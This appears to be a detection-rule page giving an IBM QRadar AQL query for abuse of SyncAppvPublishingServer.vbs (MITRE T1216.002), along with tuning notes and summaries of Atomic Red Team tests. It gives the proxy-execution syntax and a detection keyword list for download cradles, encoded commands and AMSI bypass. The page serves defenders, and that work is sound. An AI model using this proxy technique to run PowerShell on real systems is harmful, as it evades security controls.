T1216.002 IBM QRadar · QRadar

Detect SyncAppvPublishingServer in IBM QRadar

Adversaries may abuse SyncAppvPublishingServer.vbs to proxy execution of malicious PowerShell commands, bypassing execution restrictions and evading defensive countermeasures. SyncAppvPublishingServer.vbs is a legitimate, Microsoft-signed Visual Basic script associated with Windows Application Virtualization (App-V), located in System32 and commonly executed via wscript.exe. By embedding PowerShell commands in the script's argument using the syntax `SyncAppvPublishingServer.vbs "n; {PowerShell}"`, adversaries can invoke PowerShell logic through a trusted signed host process rather than calling powershell.exe directly. This technique has been observed in DarkHotel APT and BlueNoroff campaigns as a means of evading script-block logging, execution policy restrictions, and process-based detection rules that focus on powershell.exe as the initiating process.

MITRE ATT&CK

Tactic
Defense Evasion
Technique
T1216 System Script Proxy Execution
Sub-technique
T1216.002 SyncAppvPublishingServer
Canonical reference
https://attack.mitre.org/techniques/T1216/002/

QRadar Detection Query

IBM QRadar (QRadar)
sql 
SELECT
  DATEFORMAT(starttime, 'yyyy-MM-dd HH:mm:ss') AS event_time,
  LOGSOURCENAME(logsourceid) AS log_source,
  sourceip AS host_ip,
  username,
  "Process Image" AS process_image,
  "CommandLine" AS command_line,
  "Parent Process Image" AS parent_image,
  "Parent CommandLine" AS parent_command_line
FROM events
WHERE
  LOGSOURCETYPEID(logsourceid) = 12
  AND QIDNAME(qid) ILIKE '%process create%'
  AND (
    /* Branch 1: wscript/cscript invoking SyncAppvPublishingServer with embedded PS payload */
    (
      LOWER("Process Image") MATCHES '(wscript|cscript)\.exe$'
      AND LOWER("CommandLine") ILIKE '%syncappvpublishingserver%'
      AND (
           LOWER("CommandLine") ILIKE '%invoke-expression%'
        OR LOWER("CommandLine") ILIKE '%iex(%'
        OR LOWER("CommandLine") ILIKE '%iex %'
        OR LOWER("CommandLine") ILIKE '%net.webclient%'
        OR LOWER("CommandLine") ILIKE '%downloadstring%'
        OR LOWER("CommandLine") ILIKE '%downloadfile%'
        OR LOWER("CommandLine") ILIKE '%-encodedcommand%'
        OR LOWER("CommandLine") ILIKE '%-enc %'
        OR LOWER("CommandLine") ILIKE '%new-object%'
        OR LOWER("CommandLine") ILIKE '%bypass%'
        OR LOWER("CommandLine") ILIKE '%shellcode%'
        OR LOWER("CommandLine") ILIKE '%frombase64string%'
        OR LOWER("CommandLine") ILIKE '%amsiutils%'
      )
    )
    OR
    /* Branch 2: PowerShell spawned as child of wscript/cscript that referenced SyncAppvPublishingServer */
    (
      LOWER("Process Image") MATCHES '(powershell|pwsh)\.exe$'
      AND LOWER("Parent Process Image") MATCHES '(wscript|cscript)\.exe$'
      AND LOWER("Parent CommandLine") ILIKE '%syncappvpublishingserver%'
    )
    OR
    /* Branch 3: SyncAppvPublishingServer invoked from unexpected parent */
    (
      LOWER("Process Image") MATCHES '(wscript|cscript)\.exe$'
      AND LOWER("CommandLine") ILIKE '%syncappvpublishingserver%'
      AND LOWER("Parent Process Image") NOT MATCHES '(explorer|svchost|services|winlogon|cmd)\.exe$'
    )
  )
LAST 24 HOURS
ORDER BY starttime DESC
high severity medium confidence

Detects T1216.002 SyncAppvPublishingServer.vbs abuse using QRadar AQL against Sysmon Process Create events (Event ID 1). Three branches cover direct invocation of SyncAppvPublishingServer with PowerShell payload keywords, PowerShell spawned as a child of the wscript/cscript SyncAppv proxy, and SyncAppvPublishingServer execution from an unexpected parent. Requires the QRadar Sysmon DSM to have mapped Process Image, CommandLine, Parent Process Image, and Parent CommandLine as custom event properties. LOGSOURCETYPEID 12 corresponds to Microsoft Windows Security Event Log; adjust to the correct ID for your Sysmon log source type if different.

Data Sources

Microsoft Windows Sysmon via QRadar DSMQRadar SIEM with Windows Event Log log source

Required Tables

events

False Positives & Tuning

  • Legitimate App-V package publishing operations by IT administrators where wscript.exe invokes SyncAppvPublishingServer.vbs and the command line incidentally contains PowerShell-like strings for App-V parameter passing
  • Automated software provisioning systems (e.g., SCCM App-V integration, Flexera InstallShield) that trigger SyncAppvPublishingServer invocations with dynamic command-line arguments as part of managed deployment sequences
  • Security assessment or authorized red team exercises that simulate T1216.002 in the environment as part of scheduled adversary emulation testing
Download portable Sigma rule (.yml)

Other platforms for T1216.002

Microsoft Sentinel (KQL) Splunk (SPL) Elastic Security (Elastic) Sumo Logic CSE (Sumo) Google Chronicle (YARA-L) CrowdStrike LogScale (LogScale) All platforms (combined) →

Testing Methodology

Validate this detection against 4 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.

  1. Test 1SyncAppvPublishingServer PowerShell Proxy — Benign Command

    Expected signal: Sysmon Event ID 1: wscript.exe with CommandLine containing 'SyncAppvPublishingServer.vbs' and the argument 'n; whoami'. PowerShell ScriptBlock Log Event ID 4104 may capture the proxied command execution depending on the App-V configuration. Security Event ID 4688 (if command line auditing enabled) for wscript.exe.

  2. Test 2SyncAppvPublishingServer PowerShell Proxy — Encoded Command

    Expected signal: Sysmon Event ID 1: wscript.exe with CommandLine containing 'SyncAppvPublishingServer.vbs', '-encodedCommand', and the Base64 payload. PowerShell ScriptBlock Log Event ID 4104 capturing the decoded command 'Write-Output Argus-Test-T1216.002'. If PowerShell spawns as a child process, a second Sysmon Event ID 1 for powershell.exe with parent=wscript.exe.

  3. Test 3SyncAppvPublishingServer PowerShell Proxy — Download Cradle Simulation

    Expected signal: Sysmon Event ID 1: wscript.exe with CommandLine containing 'SyncAppvPublishingServer.vbs', 'Net.WebClient', 'DownloadString', and 'IEX'. Sysmon Event ID 3: network connection attempt to 127.0.0.1:8080 originating from wscript.exe or a child powershell.exe. PowerShell ScriptBlock Log Event ID 4104 capturing the download cradle code.

  4. Test 4SyncAppvPublishingServer via cmd.exe — Indirect Invocation

    Expected signal: Sysmon Event ID 1 for cmd.exe (from whatever launched the test), then Sysmon Event ID 1 for wscript.exe with ParentImage=cmd.exe and CommandLine containing 'SyncAppvPublishingServer.vbs' and the PowerShell Get-Process command. The parent-child chain cmd.exe -> wscript.exe -> [powershell proxy] is captured.

Last updated: 2026-04-13 Research depth: deep
References (9)

Unlock Pro Content

Get the full detection package for T1216.002 including response playbook, investigation guide, and atomic red team tests.

Response PlaybookInvestigation GuideHunting QueriesAtomic Red Team TestsTuning Guidance
Sign Up for Pro View Pricing

Related Detections

Parent Technique

T1216System Script Proxy Execution

Related Sub-techniques

T1216.001PubPrn

Related Techniques

T1216System Script Proxy ExecutionT1216.001PubPrnT1059.001PowerShellT1218System Binary Proxy ExecutionT1218.005MshtaT1027Obfuscated Files or InformationT1027.010Command ObfuscationT1105Ingress Tool TransferT1566.001Spearphishing AttachmentT1053.005Scheduled Task

Same Tactic: Defense Evasion

Popular Detections